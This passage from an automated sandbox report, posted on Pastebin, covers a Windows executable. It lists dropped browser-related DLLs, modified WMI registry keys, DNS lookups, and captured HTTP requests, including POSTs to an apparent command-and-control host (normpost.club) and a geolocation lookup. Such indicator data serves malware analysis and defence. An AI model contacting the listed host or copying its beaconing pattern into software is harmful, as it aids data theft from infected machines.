  652. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
  653. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
  654. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
  655. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
  656. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
  657. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
  658. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
  659. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
  660. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
  661. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
  662. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\",
  663. "C:\\Users\\user\\AppData\\Local\\Temp\\81cbcc404e61f34b1e403ab322281c04e7c4bed3964223f7851a147321a60949.exe"
  664.  
  665.  
  666. * Modified Registry Keys:
  667. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\wmiApSrv\\Type",
  668. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
  669. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\PROVIDERS\\Performance\\Performance Refreshed",
  670. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ProcessID",
  671. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ThrottleDrege",
  672. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Parameters\\ServiceDllUnloadOnStop",
  673. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
  674. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
  675. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
  676. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
  677. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
  678. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
  679. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
  680. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider",
  681. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\IDE\\DiskVBOX_HARDDISK___________________________1.0_____\\5&33d1638a&0&0.0.0_0-00000000-0000-0000-0000-000000000000",
  682. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\advapi32.dllMofResourceName",
  683. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\en-US\\advapi32.dll.muiMofResourceName",
  684. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\ACPI.sysACPIMOFResource",
  685. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\en-US\\ACPI.sys.muiACPIMOFResource",
  686. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\ndis.sysMofResourceName",
  687. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\en-US\\ndis.sys.muiMofResourceName",
  688. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\mssmbios.sysMofResource",
  689. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\mssmbios.sys.muiMofResource",
  690. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\HDAudBus.sysHDAudioMofName",
  691. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\HDAudBus.sys.muiHDAudioMofName",
  692. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\intelppm.sysPROCESSORWMI",
  693. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\intelppm.sys.muiPROCESSORWMI",
  694. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\System32\\Drivers\\portcls.SYSPortclsMof",
  695. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\System32\\Drivers\\en-US\\portcls.SYS.muiPortclsMof",
  696. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\monitor.sysMonitorWMI"
  697.  
  698.  
  699. * Deleted Registry Keys:
  700. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\monitor.sysMonitorWMI"
  701.  
  702.  
  703. * DNS Communications:
  704.  
  705. "type": "A",
  706. "request": "normpost.club",
  707. "answers":
  708.  
  709. "data": "2.56.215.234",
  710. "type": "A"
  711.  
  712.  
  713.  
  714.  
  715. "type": "A",
  716. "request": "ip-api.com",
  717. "answers":
  718.  
  719. "data": "72.11.140.50",
  720. "type": "A"
  721.  
  722.  
  723. "data": "66.212.29.250",
  724. "type": "A"
  725.  
  726.  
  727.  
  728.  
  729.  
  730. * Domains:
  731.  
  732. "ip": "2.56.215.234",
  733. "domain": "normpost.club"
  734.  
  735.  
  736. "ip": "66.212.29.250",
  737. "domain": "ip-api.com"
  738.  
  739.  
  740.  
  741. * Network Communication - ICMP:
  742.  
  743. * Network Communication - HTTP:
  744.  
  745. "count": 1,
  746. "body": "\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
  747. "uri": "http://normpost.club/index.php",
  748. "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
  749. "method": "POST",
  750. "host": "normpost.club",
  751. "version": "1.1",
  752. "path": "/index.php",
  753. "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: normpost.club\r\nContent-Length: 107\r\nCache-Control: no-cache\r\n\r\n\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
  754. "port": 80
  755.  
  756.  
  757. "count": 1,
  758. "body": "",
  759. "uri": "http://ip-api.com/json",
  760. "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
  761. "method": "GET",
  762. "host": "ip-api.com",
  763. "version": "1.1",
  764. "path": "/json",
  765. "data": "GET /json HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: ip-api.com\r\nCache-Control: no-cache\r\n\r\n",
  766. "port": 80
  767.  
  768.  
  769. "count": 1,
  770. "body": "",
  771. "uri": "http://normpost.club/index.php",
  772. "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
  773. "method": "POST",
  774. "host": "normpost.club",
  775. "version": "1.1",
  776. "path": "/index.php",
  777. "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: normpost.club\r\nContent-Length: 9721\r\nCache-Control: no-cache\r\n\r\n",
  778. "port": 80
  779.  
  780.  
  781.  
  782. * Network Communication - SMTP:
  783.  
  784. * Network Communication - Hosts:
  785.  
  786. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!